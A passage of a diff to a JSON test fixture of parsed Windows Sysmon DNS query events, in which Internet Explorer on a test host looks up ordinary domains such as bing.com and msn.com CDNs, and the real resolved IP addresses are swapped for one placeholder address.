Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:23.50.53.185;::ffff:23.50.53.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:06.051Z", @@ -14983,17 +14810,17 @@ "type": "CNAME" }, { - "data": "23.50.53.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.186", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -15009,14 +14836,13 @@ "static-entertainment-eus-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313928518Z", + "ingested": "2021-12-09T13:49:44.739808Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15084,12 +14910,12 @@ "type": "CNAME" }, { - "data": "23.217.149.91", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.217.149.91" + "89.160.20.156" ] }, "network": { @@ -15106,13 +14932,13 @@ "radarmaps.weather.microsoft.com" ], "ip": [ - "23.217.149.91" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313929844Z", + "ingested": "2021-12-09T13:49:44.739811800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:23.217.149.91;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15176,17 +15002,17 @@ "type": "CNAME" }, { - "data": "23.50.53.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.186", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -15202,14 +15028,13 @@ "static-entertainment-eus-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313931151Z", + "ingested": "2021-12-09T13:49:44.739816200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15273,12 +15098,12 @@ "type": "CNAME" }, { - "data": "152.195.32.163", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "152.195.32.163" + "89.160.20.156" ] }, "network": { @@ -15294,13 +15119,13 @@ "tag.sp.advertising.com" ], "ip": [ - "152.195.32.163" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313932407Z", + "ingested": "2021-12-09T13:49:44.739822Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:152.195.32.163;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15368,17 +15193,17 @@ "type": "CNAME" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -15395,14 +15220,13 @@ "www.bing.com" ], "ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313933804Z", + "ingested": "2021-12-09T13:49:44.739826Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15470,12 +15294,12 @@ "type": "CNAME" }, { - "data": "23.52.164.109", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "network": { @@ -15492,13 +15316,13 @@ "cdn.doubleverify.com" ], "ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313935377Z", + "ingested": "2021-12-09T13:49:44.739829900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15577,12 +15401,12 @@ "type": "CNAME" }, { - "data": "23.52.164.109", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "network": { @@ -15600,13 +15424,13 @@ "cdn3.doubleverify.com" ], "ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313936765Z", + "ingested": "2021-12-09T13:49:44.739833300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 